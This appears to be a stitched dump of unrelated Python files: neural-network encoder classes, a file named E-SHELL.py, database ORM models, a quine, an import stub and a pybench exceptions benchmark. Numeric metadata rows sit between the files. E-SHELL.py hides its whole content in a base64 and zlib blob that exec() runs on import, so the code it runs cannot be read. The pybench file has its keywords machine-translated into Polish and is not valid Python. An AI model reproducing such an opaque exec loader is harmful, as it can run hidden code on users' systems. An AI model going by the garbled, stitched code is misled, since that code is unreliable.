param.requires_grad_(trainable)
self.spatial_output = spatial_output
self.use_goal_seg = use_goal_seg
if not self.spatial_output:
self.output_shape = (output_size,)
self.visual_fc = nn.Sequential(
Flatten(),
nn.Linear(np.prod(self.visual_encoder.output_shape), output_size),
nn.ReLU(True),
)
else:
self.spatial_embeddings = nn.Embedding(
self.visual_encoder.output_shape[1]
* self.visual_encoder.output_shape[2],
64,
)
self.output_shape = list(self.visual_encoder.output_shape)
self.output_shape[0] += self.spatial_embeddings.embedding_dim
self.output_shape = tuple(self.output_shape)
@property
def is_blind(self):
return self._n_input_rgb == 0
def forward(self, observations):
"""
Args:
observations: [BATCH, HEIGHT, WIDTH, CHANNEL]
Returns:
[BATCH, OUTPUT_SIZE]
"""
obs_semantic = observations["semantic"]
if len(obs_semantic.size()) == 5:
observations["semantic"] = obs_semantic.contiguous().view(
-1, obs_semantic.size(2), obs_semantic.size(3), obs_semantic.size(4)
)
if "semantic_features" in observations:
x = observations["semantic_features"]
else:
# Embed input when using all object categories
if not self.use_goal_seg:
categories = observations["semantic"].long() + 1
observations["semantic"] = self.semantic_embedder(categories)
x = self.visual_encoder(observations)
if self.spatial_output:
b, c, h, w = x.size()
spatial_features = (
self.spatial_embeddings(
torch.arange(
0,
self.spatial_embeddings.num_embeddings,
device=x.device,
dtype=torch.long,
)
)
.view(1, -1, h, w)
.expand(b, self.spatial_embeddings.embedding_dim, h, w)
)
return torch.cat([x, spatial_features], dim=1)
else:
return self.visual_fc(x)
class ResnetEncoder(nn.Module):
def __init__(
self,
observation_space,
output_size=256,
checkpoint="NONE",
backbone="resnet50",
resnet_baseplanes=32,
normalize_visual_inputs=False,
trainable=True,
spatial_output: bool = False,
sem_embedding_size=4,
):
super().__init__()
self.visual_encoder = ResNetEncoder(
observation_space,
baseplanes=resnet_baseplanes,
ngroups=resnet_baseplanes // 2,
make_backbone=getattr(resnet, backbone),
normalize_visual_inputs=normalize_visual_inputs,
sem_embedding_size=sem_embedding_size,
)
for param in self.visual_encoder.parameters():
param.requires_grad_(trainable)
self.spatial_output = spatial_output
if not self.spatial_output:
self.output_shape = (output_size,)
self.visual_fc = nn.Sequential(
Flatten(),
nn.Linear(np.prod(self.visual_encoder.output_shape), output_size),
nn.ReLU(True),
)
else:
self.spatial_embeddings = nn.Embedding(
self.visual_encoder.output_shape[1]
* self.visual_encoder.output_shape[2],
64,
)
self.output_shape = list(self.visual_encoder.output_shape)
self.output_shape[0] += self.spatial_embeddings.embedding_dim
self.output_shape = tuple(self.output_shape)
def forward(self, observations):
"""
Args:
observations: [BATCH, HEIGHT, WIDTH, CHANNEL]
Returns:
[BATCH, OUTPUT_SIZE]
"""
obs_rgb = observations["rgb"]
if len(obs_rgb.size()) == 5:
observations["rgb"] = obs_rgb.contiguous().view(
-1, obs_rgb.size(2), obs_rgb.size(3), obs_rgb.size(4)
)
obs_depth = observations["depth"]
if len(obs_depth.size()) == 5:
observations["depth"] = obs_depth.contiguous().view(
-1, obs_depth.size(2), obs_depth.size(3), obs_depth.size(4)
)
obs_semantic = observations["semantic"]
if len(obs_semantic.size()) == 5:
observations["semantic"] = obs_semantic.contiguous().view(
-1, obs_semantic.size(2), obs_semantic.size(3), obs_semantic.size(4)
)
if "rgb_features" in observations:
x = observations["rgb_features"]
else:
x = self.visual_encoder(observations)
if self.spatial_output:
b, c, h, w = x.size()
spatial_features = (
self.spatial_embeddings(
torch.arange(
0,
self.spatial_embeddings.num_embeddings,
device=x.device,
dtype=torch.long,
)
)
.view(1, -1, h, w)
.expand(b, self.spatial_embeddings.embedding_dim, h, w)
)
return torch.cat([x, spatial_features], dim=1)
else:
return self.visual_fc(x)
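A minimal forward-pass sketch for VlnResnetDepthEncoder above, assuming habitat_baselines is installed and its ResNetEncoder accepts a single-channel depth space; the 256x256 resolution and batch size of 4 are arbitrary choices:

import numpy as np
import torch
from gym import spaces

# Hypothetical observation space exposing one depth sensor.
obs_space = spaces.Dict(
    {"depth": spaces.Box(low=0.0, high=1.0, shape=(256, 256, 1), dtype=np.float32)}
)
encoder = VlnResnetDepthEncoder(obs_space, output_size=128)  # checkpoint="NONE", so no DDPPO weights are loaded

batch = {"depth": torch.rand(4, 256, 256, 1)}  # [BATCH, HEIGHT, WIDTH, CHANNEL]
features = encoder(batch)
print(features.shape)  # expected: torch.Size([4, 128])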
| 33.269036
| 90
| 0.553326
| 1,343
| 13,108
| 5.139985
| 0.11169
| 0.0536
| 0.071418
| 0.05331
| 0.824569
| 0.809648
| 0.777053
| 0.756193
| 0.756193
| 0.740692
| 0
| 0.012924
| 0.350702
| 13,108
| 393
| 91
| 33.35369
| 0.798144
| 0.030897
| 0
| 0.731013
| 0
| 0
| 0.024373
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031646
| false
| 0
| 0.031646
| 0.006329
| 0.107595
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7b8777fb3b666de80d59f2e24fb98ba5f700da5d
| 1,510
|
py
|
Python
|
E-SHELL.py
|
mrkeok/encryptSHELL
|
f20d3657d76f318e762d37a1f5aa5952a2571664
|
[
"Apache-2.0"
] | null | null | null |
E-SHELL.py
|
mrkeok/encryptSHELL
|
f20d3657d76f318e762d37a1f5aa5952a2571664
|
[
"Apache-2.0"
] | null | null | null |
E-SHELL.py
|
mrkeok/encryptSHELL
|
f20d3657d76f318e762d37a1f5aa5952a2571664
|
[
"Apache-2.0"
] | null | null | null |
import zlib,base64
exec(zlib.decompress(base64.b64decode("eJzFV+uO2kYU/j9PceL+MLSB5RL1QrOrlg3ZrjbdRASJrraraIAhWOCLfFGCACk/869bqSukSEhRkZB4gj5A34Qn6ZnxeLANVtLuJjVjc+Y7lznnzJzx+AsofFmArt0zrJc1CPx+4VuOEGKYju36YHsR5Y0V2TdGzLCcwI8A3zBZRLvU6tkmIedwCPqvpWr1smTq5JHqfce7bdUtf1/9BoF6HHiAQDMOlBE4iQMVBC7iQBWB4zjwNQKEekPE6vAV6Jc6Ptuc2sx/47RAr0AnXjD0mIdyJym5t+84fRLJMdd2UaqZlLrHKYFd4YCkQy2LuSU41DSNTGabm/ebm+vNzUo8l7C5+UNQ16n+nFOQko4Jz5OSSTPXBGAKoNSXgv5d3YIbMeWwijtVnDnhUmuh/C7l5UJhC5BS6pHgJlUXaFJdPBt7ApKd1ZbaxhoRK+WgumIDzUX0YRwr7s02JvR2mqG1SHfWor+QMa1D8TVO4sN4rj9zOyIicw8xeW/+nMyOYtmsj6EGP7svzqqlsxisRP93z7EEin3bNamfa95vi18zdrfzUblgVfFySS2ReFtG05fJ5esG5P8+seVWhBOyZLbXNE1Ot5AkpiRRRlu3dkom5dn7PfgOukwONJlNI8v7R5x+wNNkePucuI5VM0S1nBHGDmMPxFGSnYpwJWdM4ce31Q5xh20eOjnFmwb+ADf8zrimakzMyZT/D41X1KqWH5R/eGlSY1Ts2mZUf2K/ycjBx7f1DnGHbfFfp2KeVYF3rRNNA1xOZuXJ7Ao7jfPj5umzVoiHnErIaTXOWz+en8Q5Vanzy2nrdtOy+Fw66F5qv2zGdstmYudM3GoXrYSHDhnvrevsE7V55OB2f5rMPDw7Ugu8rms4PvQMcJg1FhiisUtO41Z9MjMsn7kWHR34bMQc2wKfOVTYGAXUhb496uELZkf91gX6idoi+dZs3r8Q83wh35e2V8RzuM9MyOndEaOunieOizmAcA0Q0mN9YNYQE5nL13i0vjuuRUegfeqSFbdSSYI5flTWji1NnnS1mibPxVpOk+dg7cDrdanbOwjn0AyK3kBJ5TVQ48g5PsTvhFcvxEdEjp/SpZXnIVeT53Pt8EjQ7ZSbun4LDy1qUgzUDeBDvtqBj/5l+fo05Gb7qrKd0zrUGxTsTj/wutRnQk4mAhWhYAtEDpeKNSe/T1CwztwB9fB1UyxqQoq97jK0ccbGHRtDO+W14AaOX0uZEJ8ufCRugVm+cS+hf/q04aJEptZj/N6DltGjQ3hkQIuZwZBa3AQhPh3aw0SGRP4vVdb//ktNypUCnxkjYwCWbdqu4gLPX54YfZA28VBY1gBd2PZLZU04GS1wklrTzhjf2VYFGoXnPzWePCk6Yz1lsZK2WAktZlRGvCpKWaP5zApH+tfeVNPeVENv5CqvXzQAbz1tmL02fDRF/gHXEgft")))
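exec() on an opaque base64+zlib blob is a classic obfuscation pattern, so the prudent way to study a file like this is to run the same decoding pipeline without executing the result. A sketch; payload stands in for the long base64 string from the exec() call above:

import base64
import zlib

payload = "eJzFV+uO..."  # the full base64 string from the exec() call
source = zlib.decompress(base64.b64decode(payload)).decode("utf-8", errors="replace")
print(source)  # inspect the recovered Python source instead of exec()ing it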
| 755
| 1,491
| 0.962914
| 50
| 1,510
| 29.08
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157162
| 0.001325
| 1,510
| 2
| 1,491
| 755
| 0.807029
| 0
| 0
| 0
| 0
| 0.5
| 0.958306
| 0.958306
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
7ba12f3ca69fd03d54e407511d82d5e83abbc047
| 11,746
|
py
|
Python
|
SBaaS_COBRA/stage02_physiology_simulatedData_postgresql_models.py
|
dmccloskey/SBaaS_COBRA
|
65635495c4fb7cc98f5c6629e495850e908ea858
|
[
"MIT"
] | null | null | null |
SBaaS_COBRA/stage02_physiology_simulatedData_postgresql_models.py
|
dmccloskey/SBaaS_COBRA
|
65635495c4fb7cc98f5c6629e495850e908ea858
|
[
"MIT"
] | null | null | null |
SBaaS_COBRA/stage02_physiology_simulatedData_postgresql_models.py
|
dmccloskey/SBaaS_COBRA
|
65635495c4fb7cc98f5c6629e495850e908ea858
|
[
"MIT"
] | null | null | null |
#SBaaS base
from SBaaS_base.postgresql_orm_base import *
class data_stage02_physiology_simulatedData_fva(Base):
__tablename__ = 'data_stage02_physiology_simulatedData_fva'
id = Column(Integer, Sequence('data_stage02_physiology_simulatedData_fva_id_seq'), primary_key=True)
simulation_id = Column(String(500))
simulation_dateAndTime = Column(DateTime);
rxn_id = Column(String(100))
fva_minimum = Column(Float);
fva_maximum = Column(Float);
fva_method = Column(String(100))
allow_loops = Column(Boolean);
fva_options = Column(postgresql.JSON);
solver_id = Column(String);
flux_units = Column(String(50), default = 'mmol*gDW-1*hr-1');
used_ = Column(Boolean);
comment_ = Column(Text);
__table_args__ = (
UniqueConstraint('simulation_id',
'rxn_id',
'simulation_dateAndTime',
'flux_units',
'fva_method',
'allow_loops',
'solver_id'
),
)
def __init__(self,
row_dict_I,
):
self.flux_units=row_dict_I['flux_units'];
self.fva_maximum=row_dict_I['fva_maximum'];
self.fva_minimum=row_dict_I['fva_minimum'];
self.fva_method=row_dict_I['fva_method'];
self.rxn_id=row_dict_I['rxn_id'];
self.simulation_dateAndTime=row_dict_I['simulation_dateAndTime'];
self.simulation_id=row_dict_I['simulation_id'];
self.comment_=row_dict_I['comment_'];
self.used_=row_dict_I['used_'];
self.fva_options=row_dict_I['fva_options'];
self.allow_loops=row_dict_I['allow_loops'];
self.solver_id=row_dict_I['solver_id'];
def __set__row__(self,simulation_id_I,
simulation_dateAndTime_I,
rxn_id_I,
fva_minimum_I,fva_maximum_I,fva_method_I,
allow_loops_I,
fva_options_I,
solver_id_I,flux_units_I,
used__I,comment__I):
self.simulation_id=simulation_id_I
self.simulation_dateAndTime=simulation_dateAndTime_I;
self.rxn_id=rxn_id_I
self.fva_minimum=fva_minimum_I
self.fva_maximum=fva_maximum_I
self.fva_method=fva_method_I
self.allow_loops=allow_loops_I
self.fva_options=fva_options_I
self.solver_id=solver_id_I
self.flux_units=flux_units_I
self.used_=used__I
self.comment_=comment__I
def __repr__dict__(self):
return {'id':self.id,
'simulation_id':self.simulation_id,
'simulation_dateAndTime':self.simulation_dateAndTime,
'rxn_id':self.rxn_id,
'fva_minimum':self.fva_minimum,
'fva_maximum':self.fva_maximum,
'fva_method':self.fva_method,
'allow_loops':self.allow_loops,
'fva_options':self.fva_options,
'solver_id':self.solver_id,
'flux_units':self.flux_units,
'used_':self.used_,
'comment_':self.comment_}
def __repr__json__(self):
return json.dumps(self.__repr__dict__())
class data_stage02_physiology_simulatedData_sra(Base):
__tablename__ = 'data_stage02_physiology_simulatedData_sra'
id = Column(Integer, Sequence('data_stage02_physiology_simulatedData_sra_id_seq'), primary_key=True)
simulation_id = Column(String(500))
simulation_dateAndTime = Column(DateTime);
rxn_id = Column(String(100))
sra_gr = Column(Float);
gr_units = Column(String(50), default = 'hr-1');
sra_gr_ratio = Column(Float);
sra_method = Column(String(100))
sra_options = Column(postgresql.JSON);
solver_id = Column(String);
used_ = Column(Boolean);
comment_ = Column(Text);
__table_args__ = (
UniqueConstraint('simulation_id','rxn_id','simulation_dateAndTime','gr_units','sra_method',
'solver_id'),
)
def __init__(self,
row_dict_I,
):
self.gr_units=row_dict_I['gr_units'];
self.rxn_id=row_dict_I['rxn_id'];
self.simulation_dateAndTime=row_dict_I['simulation_dateAndTime'];
self.simulation_id=row_dict_I['simulation_id'];
self.comment_=row_dict_I['comment_'];
self.used_=row_dict_I['used_'];
self.sra_gr_ratio=row_dict_I['sra_gr_ratio'];
self.sra_gr=row_dict_I['sra_gr'];
self.sra_method=row_dict_I['sra_method'];
self.solver_id=row_dict_I['solver_id'];
def __set__row__(self,simulation_id_I,
simulation_dateAndTime_I,
rxn_id_I,
sra_gr_I,
gr_units_I,
sra_gr_ratio_I,
sra_method_I,
solver_id_I,
used__I,comment__I):
self.simulation_id=simulation_id_I
self.simulation_dateAndTime=simulation_dateAndTime_I;
self.rxn_id=rxn_id_I
self.gr_units=gr_units_I
self.sra_gr=sra_gr_I
self.sra_method=sra_method_I
self.sra_gr_ratio=sra_gr_ratio_I
self.solver_id=solver_id_I
self.used_=used__I
self.comment_=comment__I
def __repr__dict__(self):
return {'id':self.id,
'simulation_id':self.simulation_id,
'simulation_dateAndTime':self.simulation_dateAndTime,
'rxn_id':self.rxn_id,
'gr_units':self.gr_units,
'sra_gr':self.sra_gr,
'sra_method':self.sra_method,
'sra_gr_ratio':self.sra_gr_ratio,
'solver_id':self.solver_id,
'used_':self.used_,
'comment_':self.comment_}
def __repr__json__(self):
return json.dumps(self.__repr__dict__())
class data_stage02_physiology_simulatedData_fbaPrimal(Base):
__tablename__ = 'data_stage02_physiology_simulatedData_fbaPrimal'
id = Column(Integer, Sequence('data_stage02_physiology_simulatedData_fbaPrimal_id_seq'), primary_key=True)
simulation_id = Column(String(500))
simulation_dateAndTime = Column(DateTime);
rxn_id = Column(String(100))
fba_flux = Column(Float);
fba_method = Column(String(100))
allow_loops = Column(Boolean);
fba_options = Column(postgresql.JSON);
solver_id = Column(String);
flux_units = Column(String(50), default = 'mmol*gDW-1*hr-1');
used_ = Column(Boolean);
comment_ = Column(Text);
__table_args__ = (
UniqueConstraint('simulation_id','rxn_id','simulation_dateAndTime','fba_method','flux_units',
'allow_loops',
'solver_id'),
)
def __init__(self,
row_dict_I,
):
self.flux_units=row_dict_I['flux_units'];
self.fba_flux=row_dict_I['fba_flux'];
self.fba_method=row_dict_I['fba_method'];
self.rxn_id=row_dict_I['rxn_id'];
self.simulation_dateAndTime=row_dict_I['simulation_dateAndTime'];
self.simulation_id=row_dict_I['simulation_id'];
self.comment_=row_dict_I['comment_'];
self.used_=row_dict_I['used_'];
self.fba_options=row_dict_I['fba_options'];
self.allow_loops=row_dict_I['allow_loops'];
self.solver_id=row_dict_I['solver_id'];
def __set__row__(self,simulation_id_I,
simulation_dateAndTime_I,
rxn_id_I,
fba_flux_I,
fba_method_I,
allow_loops_I,
fba_options_I,
solver_id_I,
flux_units_I,
used__I,comment__I):
self.simulation_id=simulation_id_I
self.simulation_dateAndTime=simulation_dateAndTime_I;
self.rxn_id=rxn_id_I
self.fba_flux=fba_flux_I
self.fba_method=fba_method_I
self.allow_loops=allow_loops_I
self.fba_options=fba_options_I
self.solver_id=solver_id_I
self.flux_units=flux_units_I
self.used_=used__I
self.comment_=comment__I
def __repr__dict__(self):
return {'id':self.id,
'simulation_id':self.simulation_id,
'simulation_dateAndTime':self.simulation_dateAndTime,
'rxn_id':self.rxn_id,
'fba_flux':self.fba_flux,
'fba_method':self.fba_method,
'allow_loops':self.allow_loops,
'fba_options':self.fba_options,
'solver_id':self.solver_id,
'flux_units':self.flux_units,
'used_':self.used_,
'comment_':self.comment_}
def __repr__json__(self):
return json.dumps(self.__repr__dict__())
class data_stage02_physiology_simulatedData_fbaDual(Base):
__tablename__ = 'data_stage02_physiology_simulatedData_fbaDual'
id = Column(Integer, Sequence('data_stage02_physiology_simulatedData_fbaDual_id_seq'), primary_key=True)
simulation_id = Column(String(500))
simulation_dateAndTime = Column(DateTime);
met_id = Column(String(100))
fba_shadowPrice = Column(Float);
fba_method = Column(String(100))
allow_loops = Column(Boolean);
fba_options = Column(postgresql.JSON);
solver_id = Column(String);
flux_units = Column(String(50), default = 'mmol*gDW-1*hr-1');
used_ = Column(Boolean);
comment_ = Column(Text);
__table_args__ = (
UniqueConstraint('simulation_id','met_id','simulation_dateAndTime','fba_method','flux_units',
'allow_loops',
'solver_id'),
)
def __init__(self,
row_dict_I,
):
self.flux_units=row_dict_I['flux_units'];
self.fba_shadowPrice=row_dict_I['fba_shadowPrice'];
self.fba_method=row_dict_I['fba_method'];
self.met_id=row_dict_I['met_id'];
self.simulation_dateAndTime=row_dict_I['simulation_dateAndTime'];
self.simulation_id=row_dict_I['simulation_id'];
self.comment_=row_dict_I['comment_'];
self.used_=row_dict_I['used_'];
self.fba_options=row_dict_I['fba_options'];
self.allow_loops=row_dict_I['allow_loops'];
self.solver_id=row_dict_I['solver_id'];
def __set__row__(self,simulation_id_I,
simulation_dateAndTime_I,
met_id_I,
fba_shadowPrice_I,
fba_method_I,
allow_loops_I,
fba_options_I,
solver_id_I,
flux_units_I,
used__I,comment__I):
self.simulation_id=simulation_id_I
self.simulation_dateAndTime=simulation_dateAndTime_I;
self.met_id=met_id_I
self.fba_shadowPrice=fba_shadowPrice_I
self.fba_method=fba_method_I
self.allow_loops=allow_loops_I
self.fba_options=fba_options_I
self.solver_id=solver_id_I
self.flux_units=flux_units_I
self.used_=used__I
self.comment_=comment__I
def __repr__dict__(self):
return {'id':self.id,
'simulation_id':self.simulation_id,
'simulation_dateAndTime':self.simulation_dateAndTime,
'met_id':self.met_id,
'fba_shadowPrice':self.fba_shadowPrice,
'fba_method':self.fba_method,
'allow_loops':self.allow_loops,
'fba_options':self.fba_options,
'solver_id':self.solver_id,
'flux_units':self.flux_units,
'used_':self.used_,
'comment_':self.comment_}
def __repr__json__(self):
return json.dumps(self.__repr__dict__())
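A construction sketch for one of the rows above, assuming the wildcard import from SBaaS_base supplies json and the SQLAlchemy column types, as the module expects; every value below is made up:

row = data_stage02_physiology_simulatedData_fva({
    'simulation_id': 'sim_001',
    'simulation_dateAndTime': '2016-01-01T12:00:00',  # ISO string keeps __repr__json__ serializable
    'rxn_id': 'PGI',
    'fva_minimum': -1.23,
    'fva_maximum': 4.56,
    'fva_method': 'fva',
    'allow_loops': False,
    'fva_options': {},
    'solver_id': 'glpk',
    'flux_units': 'mmol*gDW-1*hr-1',
    'used_': True,
    'comment_': None,
})
print(row.__repr__json__())  # round-trips the row through __repr__dict__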
| 39.153333
| 110
| 0.619275
| 1,428
| 11,746
| 4.545518
| 0.04902
| 0.051764
| 0.059159
| 0.062856
| 0.850562
| 0.820829
| 0.779233
| 0.779233
| 0.726853
| 0.707595
| 0
| 0.008883
| 0.281202
| 11,746
| 300
| 111
| 39.153333
| 0.759919
| 0.000851
| 0
| 0.706093
| 0
| 0
| 0.141616
| 0.054533
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057348
| false
| 0
| 0.003584
| 0.028674
| 0.308244
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c87cf00f810cec8d65791a0a7c04caff8a9b5f1f
| 55
|
py
|
Python
|
lang/Python/quine-3.py
|
ethansaxenian/RosettaDecode
|
8ea1a42a5f792280b50193ad47545d14ee371fb7
|
[
"MIT"
] | null | null | null |
lang/Python/quine-3.py
|
ethansaxenian/RosettaDecode
|
8ea1a42a5f792280b50193ad47545d14ee371fb7
|
[
"MIT"
] | null | null | null |
lang/Python/quine-3.py
|
ethansaxenian/RosettaDecode
|
8ea1a42a5f792280b50193ad47545d14ee371fb7
|
[
"MIT"
] | null | null | null |
x = 'x = {!r};print(x.format(x))';print((x.format(x)))
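The quine works because the !r conversion makes str.format substitute repr() of the argument, quotes included, so feeding the template to itself reproduces the entire source line. The conversion in isolation:

# {!r} inserts repr(value), i.e. the string together with its quotes.
print('x = {!r}'.format('hello'))  # prints: x = 'hello'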
| 27.5
| 54
| 0.527273
| 11
| 55
| 2.636364
| 0.363636
| 0.413793
| 0.827586
| 0.896552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 55
| 1
| 55
| 55
| 0.58
| 0
| 0
| 0
| 0
| 0
| 0.490909
| 0.418182
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
c8fd620ee077d9d7f5ba2afdcc5917fd60d38f18
| 175
|
py
|
Python
|
tf_model_zoo/__init__.py
|
NeuralNetworkLab/Stream-Fusion-Network
|
5c3f4300131c9baa8f34d9c18a0dfd61445bd3b5
|
[
"BSD-2-Clause"
] | 240
|
2018-03-28T12:00:28.000Z
|
2022-02-02T15:27:02.000Z
|
tf_model_zoo/__init__.py
|
NeuralNetworkLab/Stream-Fusion-Network
|
5c3f4300131c9baa8f34d9c18a0dfd61445bd3b5
|
[
"BSD-2-Clause"
] | 5
|
2018-08-29T01:34:20.000Z
|
2020-11-07T16:21:13.000Z
|
tf_model_zoo/__init__.py
|
NeuralNetworkLab/Stream-Fusion-Network
|
5c3f4300131c9baa8f34d9c18a0dfd61445bd3b5
|
[
"BSD-2-Clause"
] | 37
|
2018-05-02T02:41:52.000Z
|
2021-09-24T18:08:57.000Z
|
from .inceptionresnetv2.pytorch_load import inceptionresnetv2
from .inceptionv4.pytorch_load import inceptionv4
from .bninception.pytorch_load import BNInception, InceptionV3
| 43.75
| 62
| 0.885714
| 19
| 175
| 8
| 0.421053
| 0.217105
| 0.335526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030864
| 0.074286
| 175
| 3
| 63
| 58.333333
| 0.907407
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cdd5620255d7484f6848cec228994612f3c45cfc
| 14,679
|
py
|
Python
|
Tools/pybench/Exceptions.py
|
sireliah/polish-python
|
605df4944c2d3bc25f8bf6964b274c0a0d297cc3
|
[
"PSF-2.0"
] | 1
|
2018-06-21T18:21:24.000Z
|
2018-06-21T18:21:24.000Z
|
Tools/pybench/Exceptions.py
|
sireliah/polish-python
|
605df4944c2d3bc25f8bf6964b274c0a0d297cc3
|
[
"PSF-2.0"
] | null | null | null |
Tools/pybench/Exceptions.py
|
sireliah/polish-python
|
605df4944c2d3bc25f8bf6964b274c0a0d297cc3
|
[
"PSF-2.0"
] | null | null | null |
z pybench zaimportuj Test
klasa TryRaiseExcept(Test):
version = 2.0
operations = 2 + 3 + 3
rounds = 80000
def test(self):
error = ValueError
dla i w range(self.rounds):
spróbuj:
podnieś error
wyjąwszy:
dalej
spróbuj:
podnieś error
wyjąwszy:
dalej
spróbuj:
podnieś error("something")
wyjąwszy:
dalej
spróbuj:
podnieś error("something")
wyjąwszy:
dalej
spróbuj:
podnieś error("something")
wyjąwszy:
dalej
spróbuj:
podnieś error("something")
wyjąwszy:
dalej
spróbuj:
podnieś error("something")
wyjąwszy:
dalej
spróbuj:
podnieś error("something")
wyjąwszy:
dalej
def calibrate(self):
error = ValueError
dla i w range(self.rounds):
dalej
klasa TryExcept(Test):
version = 2.0
operations = 15 * 10
rounds = 150000
def test(self):
dla i w range(self.rounds):
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
